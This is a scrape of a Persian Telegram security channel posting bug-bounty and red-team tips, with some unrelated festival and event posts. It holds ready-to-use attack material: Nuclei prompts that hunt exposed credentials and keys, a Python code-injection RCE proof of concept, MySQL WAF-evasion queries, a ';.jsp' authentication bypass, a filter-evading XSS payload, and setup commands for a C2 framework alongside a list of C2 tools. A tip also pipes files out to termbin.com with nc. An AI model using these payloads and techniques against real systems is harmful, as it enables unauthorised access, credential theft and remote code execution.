🔖 پیدا کردن Low Hanging Fruits با استفاده از Nuclei AI
💢 پیدا کردن فایل های مدل AI/ML در معرض دید (.pkl, .h5, .pt) که ممکن است الگوریتمهای اختصاصی یا داده های آموزشی حساس را لو دهند.
💢 پیدا کردن اسکریپت های اتوماسیون در معرض دید (.sh, .ps1, .bat) که ابزارهای داخلی یا اعتبارنامه ها را افشا می کنند.
💢 شناسایی هدرهای CSP نادرست پیکربندی شده که 'unsafe-inline' یا سورس های وایلدکارت را اجازه میدهند.
💢 تشخیص صفحاتی که توکن های JWT را در URL یا کوکیها لو میدهند.
💢 شناسایی پیامهای خطای بیش از حد پرجزئیات که جزئیات فریم ورک یا کتابخانه را افشا میکنند.
💢 پیدا کردن endpointهای برنامه که stack trace یا کد منبع را در معرض دید قرار می دهند.
💢 پیدا کردن اطلاعات حساس در کامنتهای HTML (یادداشتهای دیباگ، کلیدهای API، اعتبارنامهها).
💢 پیدا کردن فایلهای .env در معرض دید که اعتبارنامهها، کلیدهای API و پسوردهای دیتابیس را لو میدهند.
💢 پیدا کردن فایلهای پیکربندی در معرض دید مانند config.json, config.yaml, config.php, application.properties حاوی کلیدهای API و اعتبارنامههای دیتابیس.
💢 پیدا کردن فایلهای پیکربندی حاوی اطلاعات حساس مانند اعتبارنامهها، کلیدهای API، پسوردهای دیتابیس و سکرتهای سرویس ابری.
💢 پیدا کردن فایلهای پیکربندی دیتابیس مانند database.yml, db_config.php, .pgpass, .my.cnf که اعتبارنامهها را لو میدهند.
💢 پیدا کردن فایل های پیکربندی Docker و Kubernetes در معرض دید مانند docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json حاوی اعتبارنامههای ابری و سکرتها.
💢 پیدا کردن کلیدهای SSH و فایلهای پیکربندی در معرض دید مانند id_rsa, authorized_keys و ssh_config.
nuclei -list targets.txt -ai
💢 پیدا کردن فایلهای پیکربندی WordPress در معرض دید (wp-config.php) حاوی اعتبارنامههای دیتابیس و سکرتهای احراز هویت
nuclei -list targets.txt -ai
شناسایی فایلهای .npmrc و .yarnrc در معرض دید که توکنهای احراز هویت NPM را لو میدهند
nuclei -list targets.txt -ai "شناسایی لیست دایرکتوریهای باز که فایلهای حساس را در معرض دید قرار میدهند"
nuclei -list targets.txt -ai "پیدا کردن دایرکتوریهای .git در معرض دید که اجازه دانلود کامل ریپو را میدهند"
nuclei -list targets.txt -ai "پیدا کردن ریپوزیتوریهای .svn و .hg در معرض دید که کد منبع را لو میدهند"
nuclei -list targets.txt -ai "شناسایی سرورهای FTP باز که دسترسی ناشناس را اجازه میدهند"
nuclei -list targets.txt -ai "پیدا کردن endpointهای GraphQL با introspection فعال"
nuclei -list targets.txt -ai "شناسایی دایرکتوریهای .well-known در معرض دید که دادههای حساس را افشا میکنند"
nuclei -list targets.txt -ai "پیدا کردن صفحات phpinfo() عمومی که جزئیات محیط را لو میدهند"
nuclei -list targets.txt -ai "پیدا کردن داکیومنتهای Swagger, Redocly, GraphiQL و API Blueprint در معرض دید"
nuclei -list targets.txt -ai "شناسایی دایرکتوریهای .vscode و .idea در معرض دید که پیکربندیهای توسعهدهنده را لو میدهند"
nuclei -list targets.txt -ai "تشخیص آدرسهای IP داخلی (10.x.x.x, 192.168.x.x و غیره) در پاسخهای HTTP"
nuclei -list targets.txt -ai "پیدا کردن فایلهای debug.log وردپرس در معرض دید که اعتبارنامهها و پیامهای خطا را لو میدهند"
💢 تشخیص CORS پیکربندی که originهای وایلدکارت ('*') را اجازه میدهد.
💢 پیدا کردن فایل های بکآپ و لاگ عمومی (.log, .bak, .sql, .zip, .dump).
💢 پیدا کردن پنل های ادمین در معرض دید با اعتبارنامههای پیش فرض.
💢 شناسایی endpointهای API رایج که دادههای حساس کاربر را برمی گردانند و وضعیت HTTP 200 OK می دهند.
💢 تشخیص برنامههای وب که در حالت دیباگ اجرا میشوند و ممکن است اطلاعات حساس سیستم را در معرض دید قرار دهند.
@TryHackBox
nuclei -list targets.txt -ai
💢 پیدا کردن فایل های مدل AI/ML در معرض دید (.pkl, .h5, .pt) که ممکن است الگوریتمهای اختصاصی یا داده های آموزشی حساس را لو دهند.
nuclei -list targets.txt -ai
💢 پیدا کردن اسکریپت های اتوماسیون در معرض دید (.sh, .ps1, .bat) که ابزارهای داخلی یا اعتبارنامه ها را افشا می کنند.
nuclei -list targets.txt -ai
💢 شناسایی هدرهای CSP نادرست پیکربندی شده که 'unsafe-inline' یا سورس های وایلدکارت را اجازه میدهند.
nuclei -list targets.txt -ai
💢 تشخیص صفحاتی که توکن های JWT را در URL یا کوکیها لو میدهند.
nuclei -list targets.txt -ai
💢 شناسایی پیامهای خطای بیش از حد پرجزئیات که جزئیات فریم ورک یا کتابخانه را افشا میکنند.
nuclei -list targets.txt -ai
💢 پیدا کردن endpointهای برنامه که stack trace یا کد منبع را در معرض دید قرار می دهند.
nuclei -list targets.txt -ai
💢 پیدا کردن اطلاعات حساس در کامنتهای HTML (یادداشتهای دیباگ، کلیدهای API، اعتبارنامهها).
nuclei -list targets.txt -ai
💢 پیدا کردن فایلهای .env در معرض دید که اعتبارنامهها، کلیدهای API و پسوردهای دیتابیس را لو میدهند.
nuclei -list targets.txt -ai
💢 پیدا کردن فایلهای پیکربندی در معرض دید مانند config.json, config.yaml, config.php, application.properties حاوی کلیدهای API و اعتبارنامههای دیتابیس.
nuclei -list targets.txt -ai
💢 پیدا کردن فایلهای پیکربندی حاوی اطلاعات حساس مانند اعتبارنامهها، کلیدهای API، پسوردهای دیتابیس و سکرتهای سرویس ابری.
nuclei -list targets.txt -ai
💢 پیدا کردن فایلهای پیکربندی دیتابیس مانند database.yml, db_config.php, .pgpass, .my.cnf که اعتبارنامهها را لو میدهند.
nuclei -list targets.txt -ai
💢 پیدا کردن فایل های پیکربندی Docker و Kubernetes در معرض دید مانند docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json حاوی اعتبارنامههای ابری و سکرتها.
nuclei -list targets.txt -ai
💢 پیدا کردن کلیدهای SSH و فایلهای پیکربندی در معرض دید مانند id_rsa, authorized_keys و ssh_config.
nuclei -list targets.txt -ai
💢 پیدا کردن فایلهای پیکربندی WordPress در معرض دید (wp-config.php) حاوی اعتبارنامههای دیتابیس و سکرتهای احراز هویت
nuclei -list targets.txt -ai
شناسایی فایلهای .npmrc و .yarnrc در معرض دید که توکنهای احراز هویت NPM را لو میدهند
nuclei -list targets.txt -ai "شناسایی لیست دایرکتوریهای باز که فایلهای حساس را در معرض دید قرار میدهند"
nuclei -list targets.txt -ai "پیدا کردن دایرکتوریهای .git در معرض دید که اجازه دانلود کامل ریپو را میدهند"
nuclei -list targets.txt -ai "پیدا کردن ریپوزیتوریهای .svn و .hg در معرض دید که کد منبع را لو میدهند"
nuclei -list targets.txt -ai "شناسایی سرورهای FTP باز که دسترسی ناشناس را اجازه میدهند"
nuclei -list targets.txt -ai "پیدا کردن endpointهای GraphQL با introspection فعال"
nuclei -list targets.txt -ai "شناسایی دایرکتوریهای .well-known در معرض دید که دادههای حساس را افشا میکنند"
nuclei -list targets.txt -ai "پیدا کردن صفحات phpinfo() عمومی که جزئیات محیط را لو میدهند"
nuclei -list targets.txt -ai "پیدا کردن داکیومنتهای Swagger, Redocly, GraphiQL و API Blueprint در معرض دید"
nuclei -list targets.txt -ai "شناسایی دایرکتوریهای .vscode و .idea در معرض دید که پیکربندیهای توسعهدهنده را لو میدهند"
nuclei -list targets.txt -ai "تشخیص آدرسهای IP داخلی (10.x.x.x, 192.168.x.x و غیره) در پاسخهای HTTP"
nuclei -list targets.txt -ai "پیدا کردن فایلهای debug.log وردپرس در معرض دید که اعتبارنامهها و پیامهای خطا را لو میدهند"
nuclei -list targets.txt -ai
💢 تشخیص CORS پیکربندی که originهای وایلدکارت ('*') را اجازه میدهد.
nuclei -list targets.txt -ai
💢 پیدا کردن فایل های بکآپ و لاگ عمومی (.log, .bak, .sql, .zip, .dump).
nuclei -list targets.txt -ai
💢 پیدا کردن پنل های ادمین در معرض دید با اعتبارنامههای پیش فرض.
nuclei -list targets.txt -ai
💢 شناسایی endpointهای API رایج که دادههای حساس کاربر را برمی گردانند و وضعیت HTTP 200 OK می دهند.
nuclei -list targets.txt -ai
💢 تشخیص برنامههای وب که در حالت دیباگ اجرا میشوند و ممکن است اطلاعات حساس سیستم را در معرض دید قرار دهند.
@TryHackBox
🤔5❤3❤🔥2
RCE از طریق تزریق کد پایتون:
PoC:
@TryHackBox
#پایتون #rce
PoC:
{
"name": "TryHackBox ",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}شما واقعاً از خوندن متودولوژی ها لذت میبرید؟
اگر بیشتر میخواید، توی کامنتها نظرتون رو بگید چه تکنیکهایی کار کردید...
@TryHackBox
#پایتون #rce
👍11
🎙 قسمت دوم RadioZeroPod منتشر شد!
💠 جاناتان جیمز داستان هکری که پنتاگون و ناسا را در سن 15 سالگی هک کرد.
✨ از تولد یک کودک تا مرگ یک قهرمان!
🎧 این قسمت رو از اینجا ببینید:
https://youtu.be/F7raVUzP3LY
#RadioZeroPod
💠 جاناتان جیمز داستان هکری که پنتاگون و ناسا را در سن 15 سالگی هک کرد.
✨ از تولد یک کودک تا مرگ یک قهرمان!
🎧 این قسمت رو از اینجا ببینید:
https://youtu.be/F7raVUzP3LY
#RadioZeroPod
🔥6
⚡️ قدیمی اما مفید: چند ترفند MySQL برای شکستن بعضی #WAFها
@TryHackBox
#باگ_بانتی #نکته #امنیت_سایبری
SELECT -1e1 FROM test
SELECT ~1. FROM test
SELECT \N FROM test
SELECT @^1. FROM test
SELECT -id-1. FROM test
@TryHackBox
#باگ_بانتی #نکته #امنیت_سایبری
🔥10
《جشن آذرگان خجسته باد》
«روز آذر از ماه آذر در گاهشمار زرتشتی، برابر با سوم آذرماه در گاهشمار جلالی، جشن آذرگان است. ایرانیان باستان این روز را به برافروختن آتش و جشن و پایکوبی سپری میکردند، به آتشکدهها میرفتند و اهورامزدا را ستایش میکردند.»
«از میان چهار عنصر آتش، آب، خاک و باد، جایگاه آتش برای ایرانیان، ممتاز بود، زیرا با نور و راستی اهورایی پیوند داشت. ایرانیان با اتکا به همین باور دیرین، هزاران سال جشنهای آذرگان و سده را که حول محور آتش معنا میشوند، برگزار میکردند و بر این باور استوار بودند که وقتی میگویند «چراغ خانهات خاموش مباد» در واقع آرزو میکنند پیوند فرد با نور ایزدی گسسته نشود.»
«متون تاریخی و آیینی ایران نشان میدهد که برخلاف آنچه برخی ادعا میکنند، ایرانیان باستان هرگز آتشپرست نبودند، بلکه به باور آنان در واقع این آتش بود که آنها را به نور ایزدی پیوند میداد، روشنایی و گرما به جهان میبخشید، مظهر روشنایی در برابر تاریکی بود، حقیقت را آشکار و انسان را به بینش و خرد اهورایی نزدیکتر میکرد و هرگونه ناپاکی را میزدود.»
«روز آذر از ماه آذر در گاهشمار زرتشتی، برابر با سوم آذرماه در گاهشمار جلالی، جشن آذرگان است. ایرانیان باستان این روز را به برافروختن آتش و جشن و پایکوبی سپری میکردند، به آتشکدهها میرفتند و اهورامزدا را ستایش میکردند.»
«از میان چهار عنصر آتش، آب، خاک و باد، جایگاه آتش برای ایرانیان، ممتاز بود، زیرا با نور و راستی اهورایی پیوند داشت. ایرانیان با اتکا به همین باور دیرین، هزاران سال جشنهای آذرگان و سده را که حول محور آتش معنا میشوند، برگزار میکردند و بر این باور استوار بودند که وقتی میگویند «چراغ خانهات خاموش مباد» در واقع آرزو میکنند پیوند فرد با نور ایزدی گسسته نشود.»
«متون تاریخی و آیینی ایران نشان میدهد که برخلاف آنچه برخی ادعا میکنند، ایرانیان باستان هرگز آتشپرست نبودند، بلکه به باور آنان در واقع این آتش بود که آنها را به نور ایزدی پیوند میداد، روشنایی و گرما به جهان میبخشید، مظهر روشنایی در برابر تاریکی بود، حقیقت را آشکار و انسان را به بینش و خرد اهورایی نزدیکتر میکرد و هرگونه ناپاکی را میزدود.»
❤16🔥2👎1🤔1
Forwarded from P.F.K Security
AdaptixC2 v0.10
رلیز جدید بهترین open-source C2 منتشر شد
https://adaptix-framework.gitbook.io/adaptix-framework/blogs
UPD 0.10:
تغییرات
قابلیت ها :
💻 مخزن
💻 کیت افزونه
📔 مستندات
#adaptixc2 #redteam #ردتیم
@PfkSecurity
رلیز جدید بهترین open-source C2 منتشر شد
https://adaptix-framework.gitbook.io/adaptix-framework/blogs
UPD 0.10:
تغییرات
قابلیت ها :
Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal
💻 مخزن
💻 کیت افزونه
📔 مستندات
#adaptixc2 #redteam #ردتیم
@PfkSecurity
❤2
Forwarded from P.F.K Security
نصب/اجرای :
@PfkSecurity
sudo apt install mingw-w64 make
wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go
sudo apt install gcc g++ build-essential cmake libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev
git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh
./adaptixserver -profile profile.json
./AdaptixClient
@PfkSecurity
🔖 روش دور زدن احراز هویت:
💢 مراحل:
```
Target..com/carbon/server-admin/memory_info.jsp;.jsp =
محتوای صفحه رو بدون احراز هویت برمیگردونه [وضعیت ۲۰۰]
پیلود > ;.jsp
نکته:
مسیرهای حساس رو از فایلهای JS پیدا کن که نیاز به لاگین دارن.
endpointهایی رو پیدا کن که با اکستنشن تموم میشن مثل: .php, .jsp, .shtml و غیره.
هر endpoint رو با پیلود همون اکستنشن فاز کن: ;.jsp ;.php ;.shtml
اگر هر کدوم ۲۰۰ داد، دستی چک کن. ممکنه کار کنه!
لایک و اشتراک گذاشتن فراموش نشه
@TryHackBox
💢 مراحل:
Target..com/carbon/server-admin/memory_info.jsp =
ریدایرکت به صفحه لاگین [وضعیت ۳۰۱]
```
Target..com/carbon/server-admin/memory_info.jsp;.jsp =
محتوای صفحه رو بدون احراز هویت برمیگردونه [وضعیت ۲۰۰]
`پیلود > ;.jsp
نکته:
مسیرهای حساس رو از فایلهای JS پیدا کن که نیاز به لاگین دارن.
endpointهایی رو پیدا کن که با اکستنشن تموم میشن مثل: .php, .jsp, .shtml و غیره.
هر endpoint رو با پیلود همون اکستنشن فاز کن: ;.jsp ;.php ;.shtml
اگر هر کدوم ۲۰۰ داد، دستی چک کن. ممکنه کار کنه!
لایک و اشتراک گذاشتن فراموش نشه
@TryHackBox
❤6👍1
🔖 روش جالب دور زدن sanitization ورودی برای XSS.
شما هم متوجه شدید که بیشتر سایتها الان sanitization ورودی رو با بلاک کردن تگها و ایونتهای خاص انجام میدن، درسته!? نه واقعاً 😅
خب، اول یه نگاهی به چند تگ نمونه که میتونن XSS رو فعال کنن بنداز:
سایت این کلمات کلیدی رو اگر داخل تگهایی مثل < > یا </ > باشن بلاک میکنه و با هیچی (null یا رشته خالی "") جایگزین میکنه.
پس اگر پیلود زیر رو امتحان کنی:
تبدیل میشه به:
حالا یه کم عمیقتر فکر کن چی میشه اگر پیلود رو اینجوری بنویسی:
در این پیلود، به بخش اول دقت کن:
اینجا <img> یه تگ کامل ایمِیجه و قطعاً توسط فیلتر sanitization حذف میشه. اما <noscript< چی؟
میبینی که تگ <noscript> هنوز درست نوشته نشده یعنی <noscript دنبال شده با <، پس دقیقاً با منطق sanitization مچ نمیشه.
حالا بخش جالب: وقتی <img> از <noscript <img>> حذف بشه، چی میمونه؟ <noscript>!
یعنی تبدیل به این صورت میشه:
و در نهایت پیلود معتبر میشه:
@TryHackBox
#xss
شما هم متوجه شدید که بیشتر سایتها الان sanitization ورودی رو با بلاک کردن تگها و ایونتهای خاص انجام میدن، درسته!? نه واقعاً 😅
خب، اول یه نگاهی به چند تگ نمونه که میتونن XSS رو فعال کنن بنداز:
noscript, img, a, iframe, object, video, audio, form, meta
سایت این کلمات کلیدی رو اگر داخل تگهایی مثل < > یا </ > باشن بلاک میکنه و با هیچی (null یا رشته خالی "") جایگزین میکنه.
پس اگر پیلود زیر رو امتحان کنی:
<noscript>alert(1)</noscript>
تبدیل میشه به:
alert(1)
حالا یه کم عمیقتر فکر کن چی میشه اگر پیلود رو اینجوری بنویسی:
<noscript <img>> alert(1) </noscript </img>>
در این پیلود، به بخش اول دقت کن:
<noscript <img>>
اینجا <img> یه تگ کامل ایمِیجه و قطعاً توسط فیلتر sanitization حذف میشه. اما <noscript< چی؟
میبینی که تگ <noscript> هنوز درست نوشته نشده یعنی <noscript دنبال شده با <، پس دقیقاً با منطق sanitization مچ نمیشه.
حالا بخش جالب: وقتی <img> از <noscript <img>> حذف بشه، چی میمونه؟ <noscript>!
یعنی تبدیل به این صورت میشه:
<noscript <img>> → remove <img> → <noscript>
</noscript </img>> → remove </img> → </noscript>
و در نهایت پیلود معتبر میشه:
<noscript>alert(1)</noscript>
@TryHackBox
#xss
❤15👍10
درود دوستان عزیز،
امروز خوشحال میشم به شما معرفی کنم که من صفحه لینکدین مجموعه TryHackBox رو مجددا در لینکدین ایجاد کردم که فعالیت آموزشی در زمینه تست نفوذ و ردتیم را داریم. این مجموعه برای همه ی کسانی هست که به تست نفوذ و ردتیم علاقه دارن و می خوان از آموزش ها، راهکارها و تجربیات در این زمینه با هم به اشتراک بذارن.
امیدوارم که با همکاری شما، این مجموعه به یه جایی تبدیل بشه که همهی علاقهمندان به امنیت سایبری بتونن ازش استفاده کنن و اطلاعات مفیدی رو ازش بدست بیارن. لطفاً اگه علاقه مندید، به این مجموعه بپیوندید و دنبالش کنید تا از آموزش های ما بهره لازم ببرید
لینک مجموعه: https://lnkd.in/dBFp6QJK
ممنون از حضور شما و همراهی شما عزیزان .
از دوستان علاقه مندان به تولید محتوا و تدریس هم دعوت به همکاری مینماییم در صورت همکاری با مجموعه ما با ما در ارتباط باشید .
@THBxSupport
امروز خوشحال میشم به شما معرفی کنم که من صفحه لینکدین مجموعه TryHackBox رو مجددا در لینکدین ایجاد کردم که فعالیت آموزشی در زمینه تست نفوذ و ردتیم را داریم. این مجموعه برای همه ی کسانی هست که به تست نفوذ و ردتیم علاقه دارن و می خوان از آموزش ها، راهکارها و تجربیات در این زمینه با هم به اشتراک بذارن.
امیدوارم که با همکاری شما، این مجموعه به یه جایی تبدیل بشه که همهی علاقهمندان به امنیت سایبری بتونن ازش استفاده کنن و اطلاعات مفیدی رو ازش بدست بیارن. لطفاً اگه علاقه مندید، به این مجموعه بپیوندید و دنبالش کنید تا از آموزش های ما بهره لازم ببرید
لینک مجموعه: https://lnkd.in/dBFp6QJK
ممنون از حضور شما و همراهی شما عزیزان .
از دوستان علاقه مندان به تولید محتوا و تدریس هم دعوت به همکاری مینماییم در صورت همکاری با مجموعه ما با ما در ارتباط باشید .
@THBxSupport
Linkedin
TryHackBox Org | LinkedIn
TryHackBox Org | 104 followers on LinkedIn. آموزش تست نفوذ و ردتیم | مجموعه TRYHACKBOX | مرجع تخصصی آموزش Red Team و تست نفوذ و امنیت سایبری | ما با ارائه دورههای عملی و پروژهمحور، متخصصان امنیت سایبری را از سطح مبتدی تا حرفهای تربیت میکنیم. آموزشهای…
👍7❤1
This media is not supported in your browser
VIEW IN TELEGRAM
🚨 از VPS برای بانتی یا کارهای سایبرسیکوریتی استفاده میکنی؟
خسته شدی از دردسر انتقال فایلهای کوچیک؟
این جواهر مطلق رو امتحان کن 🔥
بوم! لینک میگیری مثل https://termbin.com/abcd شر کن، سیو کن، یا برای بعدا نگه دار. بدون لاگین، بدون setup. فقط جادوی ترمینال خالص. ✨
عالی برای نوتها، PoCها، یا اسکریپتها وقتی روی VPS ریموت کار میکنی.
@TryHackBox
#بانتی #سایبرسیکوریتی #نکته_لینوکس #وی_پی_اس #اینفوسک #هکینگ #باگ_بانتی
خسته شدی از دردسر انتقال فایلهای کوچیک؟
این جواهر مطلق رو امتحان کن 🔥
cat filename.txt | nc termbin.com 9999
بوم! لینک میگیری مثل https://termbin.com/abcd شر کن، سیو کن، یا برای بعدا نگه دار. بدون لاگین، بدون setup. فقط جادوی ترمینال خالص. ✨
عالی برای نوتها، PoCها، یا اسکریپتها وقتی روی VPS ریموت کار میکنی.
@TryHackBox
#بانتی #سایبرسیکوریتی #نکته_لینوکس #وی_پی_اس #اینفوسک #هکینگ #باگ_بانتی
❤6👍4❤🔥1
🔵 بررسی مفهوم سیستم EDR
در این ویدیوی کوتاه و فشرده، سیستم EDR (Endpoint Detection and Response) را به زبان ساده بررسی میکنیم. 🎯
🔗 youtube:
https://youtu.be/GFdoQqy2-jQ
@TryHackBox
#EDR #امنیت_سایبری #آموزش_فارسی #EndpointSecurity #سایبری #امنیت_اطلاعات
در این ویدیوی کوتاه و فشرده، سیستم EDR (Endpoint Detection and Response) را به زبان ساده بررسی میکنیم. 🎯
🔗 youtube:
https://youtu.be/GFdoQqy2-jQ
@TryHackBox
#EDR #امنیت_سایبری #آموزش_فارسی #EndpointSecurity #سایبری #امنیت_اطلاعات
🔥7
نگاهی به پست های قبل :
لینک های پنهان: تحلیل خانواده های مخفی اپلیکیشن های VPN .
پروژه جدیدمون
چک لیست آسیبپذیری RCE
مهندسی اجتماعی در ردتیمینگ
تبهای مفید Burp Suite
پنتست به روش «جعبهسفید»
ماتریس تاکتیکهای MITRE ATT&CK
تمام اندپوینت ها را از یک فایل JS
لیستی از مطالعه باگ بانتی
استخراج URLهای فایل های جاوااسکریپت
از VPS برای بانتی ...
بررسی مفهوم سیستم EDR
لینک های پنهان: تحلیل خانواده های مخفی اپلیکیشن های VPN .
پروژه جدیدمون
چک لیست آسیبپذیری RCE
مهندسی اجتماعی در ردتیمینگ
تبهای مفید Burp Suite
پنتست به روش «جعبهسفید»
ماتریس تاکتیکهای MITRE ATT&CK
تمام اندپوینت ها را از یک فایل JS
لیستی از مطالعه باگ بانتی
استخراج URLهای فایل های جاوااسکریپت
از VPS برای بانتی ...
بررسی مفهوم سیستم EDR
شکار باگ های Business Logic؟ این Flow رو امتحان کن:
⚡️ فلو اکسپلویت:
با یه username جدید ثبتنام کن
حساب رو فعال کن
حساب رو حذف کن
سعی کن با همون username حساب جدیدی بسازی
اگر جلوت رو گرفت این یه نقص Business Logicه!
💡 یوزرنیم های حساب های حذف شده نباید رزرو بمونن مگر اینکه دلیل معتبر تجاری/امنیتی وجود داشته باشه.
@TryHackBox
⚡️ فلو اکسپلویت:
با یه username جدید ثبتنام کن
حساب رو فعال کن
حساب رو حذف کن
سعی کن با همون username حساب جدیدی بسازی
اگر جلوت رو گرفت این یه نقص Business Logicه!
💡 یوزرنیم های حساب های حذف شده نباید رزرو بمونن مگر اینکه دلیل معتبر تجاری/امنیتی وجود داشته باشه.
@TryHackBox
👍13
Forwarded from P.F.K Security
🔖 ۱۰ فریمورک برتر C2 که هر رد تیمری باید بشناسد
هنر کنترل و فرماندهی را با دقت و استتار بیاموزید.
Mythic
یک C2 مدرن و extensible نوشته شده با Python و Go. دارای رابط وب، agentهای چندزبانه و ویژگیهای امنیت عملیاتی داخلی(opsec). مناسب تیم های حرفهای.
Cobalt Strike
یک C2 تجاری که به طور گسترده در عملیاتهای رد تیم واقعی استفاده میشود. payload Beacon از پروفایل های قابل تغییر و روشهای pivot متنوع پشتیبانی میکند.
Sliver
یک C2 متنباز و چندمنظوره توسط Bishop Fox. از implantهای Golang، ارتباطات رمزنگاری شده و رابط کاربری CLI/GUI ساده پشتیبانی میکند.
Havoc
یک C2 پیشرفته post-exploitation نوشته شده با C++، ایدهآل برای تحقیقات دور زدن EDR. تکنیکهای امنیت عملیاتی(opsec) و طراحی implantهای مدرن ارائه میدهد.
Brute Ratel
یک C2 متمرکز بر استتار و آگاه از EDR با امضاهای low detection signatures و گزینههای payload سفارشی.
Covenant
فریمورک C2 مبتنی بر.NET از Threat Intelligence مایکروسافت. قدرتمند برای engagements مبتنی بر Active Directory و یادگیری payloadهای مدرن C#.
Empire
یک agent modular مبتنی بر PowerShell و Python برای post-exploitation. عالی برای pivot در شبکه داخلی و شبیهسازی tradecraft پایه.
Quasar RAT
یک RAT سبک و راحت easy-to-customize به زبان C# برای ویندوز. رایج در engagements استتار شده یا توسعه ابزارهای سفارشی.
FudgeC2
یک C2 مبتنی بر Python با پشتیبانی از HTTPS و payloadهای گسترده ویندوزی. طراحی شده برای سادگی و استتار در شبکههای محدود.
Koadic (Zombie C2)
یک C2 مبتنی بر JavaScript با استفاده از Windows Script Host (WSH). مفید برای عملیاتهای living-off-the-land و حملات fileless.
🧩 نکته :
ابزار اپراتور را نمی سازد. internals را یاد بگیرید، implantهای خود را بنویسید، و payloadهای خود را برای هر محیط سفارشی کنید.
@pfksecurity
هنر کنترل و فرماندهی را با دقت و استتار بیاموزید.
Mythic
یک C2 مدرن و extensible نوشته شده با Python و Go. دارای رابط وب، agentهای چندزبانه و ویژگیهای امنیت عملیاتی داخلی(opsec). مناسب تیم های حرفهای.
Cobalt Strike
یک C2 تجاری که به طور گسترده در عملیاتهای رد تیم واقعی استفاده میشود. payload Beacon از پروفایل های قابل تغییر و روشهای pivot متنوع پشتیبانی میکند.
Sliver
یک C2 متنباز و چندمنظوره توسط Bishop Fox. از implantهای Golang، ارتباطات رمزنگاری شده و رابط کاربری CLI/GUI ساده پشتیبانی میکند.
Havoc
یک C2 پیشرفته post-exploitation نوشته شده با C++، ایدهآل برای تحقیقات دور زدن EDR. تکنیکهای امنیت عملیاتی(opsec) و طراحی implantهای مدرن ارائه میدهد.
Brute Ratel
یک C2 متمرکز بر استتار و آگاه از EDR با امضاهای low detection signatures و گزینههای payload سفارشی.
Covenant
فریمورک C2 مبتنی بر.NET از Threat Intelligence مایکروسافت. قدرتمند برای engagements مبتنی بر Active Directory و یادگیری payloadهای مدرن C#.
Empire
یک agent modular مبتنی بر PowerShell و Python برای post-exploitation. عالی برای pivot در شبکه داخلی و شبیهسازی tradecraft پایه.
Quasar RAT
یک RAT سبک و راحت easy-to-customize به زبان C# برای ویندوز. رایج در engagements استتار شده یا توسعه ابزارهای سفارشی.
FudgeC2
یک C2 مبتنی بر Python با پشتیبانی از HTTPS و payloadهای گسترده ویندوزی. طراحی شده برای سادگی و استتار در شبکههای محدود.
Koadic (Zombie C2)
یک C2 مبتنی بر JavaScript با استفاده از Windows Script Host (WSH). مفید برای عملیاتهای living-off-the-land و حملات fileless.
🧩 نکته :
ابزار اپراتور را نمی سازد. internals را یاد بگیرید، implantهای خود را بنویسید، و payloadهای خود را برای هر محیط سفارشی کنید.
@pfksecurity
❤6🔥5👍1
Forwarded from رادیو زیرو پاد
📌 برگزاری جلسه ویس چت : مهندس سجاد تیموری، از اساتید تراز اول امنیت سایبری ایران
با سلام خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص واقعیت های محیط کاری امنیت سایبری از جذابیت تا سختی هایی که این محیط دارد به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
مهندس سجاد تیموری
📅 زمان برگزاری: دوشنبه 1404/09/17
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖 لینک جلسه :
⁉️ موضوعات ما :
💠 توقعات اشتباه درباره پنتست
💠 استرس ددلاین ها
💬 سوالات خود را درباره واقعیتهای محیط کاری امنیت سایبری از جذابیت تا سختی هایی که این محیط دارد در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
با سلام خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص واقعیت های محیط کاری امنیت سایبری از جذابیت تا سختی هایی که این محیط دارد به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
مهندس سجاد تیموری
📅 زمان برگزاری: دوشنبه 1404/09/17
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖 لینک جلسه :
⁉️ موضوعات ما :
💠 توقعات اشتباه درباره پنتست
💠 استرس ددلاین ها
💬 سوالات خود را درباره واقعیتهای محیط کاری امنیت سایبری از جذابیت تا سختی هایی که این محیط دارد در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
❤7